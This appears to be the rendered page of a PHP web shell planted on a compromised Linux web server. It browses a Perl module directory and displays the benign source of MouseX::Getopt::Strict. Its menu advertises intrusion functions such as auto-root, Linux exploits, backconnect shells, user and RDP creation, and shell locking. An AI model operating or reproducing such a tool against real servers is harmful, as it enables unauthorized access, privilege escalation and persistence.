Linux web0273.sh.tyo1 4.18.0-553.141.2.lve.el7h.x86_64 #1 SMP Wed Jul 8 17:20:31 UTC 2026 x86_64
Apache
: 127.0.0.1 | : 216.73.216.133
Cant Read [ /etc/named.conf ]
8.3.31
r2745769
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
MouseX /
Getopt /
[ HOME SHELL ]
Name
Size
Permission
Action
Meta
[ DIR ]
drwxr-xr-x
Basic.pm
7.39
KB
-r--r--r--
Dashes.pm
1.36
KB
-r--r--r--
GLD.pm
2.32
KB
-r--r--r--
OptionTypeMap.pm
2.21
KB
-r--r--r--
Strict.pm
578
B
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Strict.pm
package MouseX::Getopt::Strict; # ABSTRACT: only make options for attrs with the Getopt metaclass use Mouse::Role; with 'MouseX::Getopt'; around '_compute_getopt_attrs' => sub { my $next = shift; my ( $class, @args ) = @_; grep { $_->does("MouseX::Getopt::Meta::Attribute::Trait") } $class->$next(@args); }; no Mouse::Role; 1; =head1 DESCRIPTION This is an stricter version of C<MouseX::Getopt> which only processes the attributes if they explicitly set as C<Getopt> attributes. All other attributes are ignored by the command line handler. =cut
Close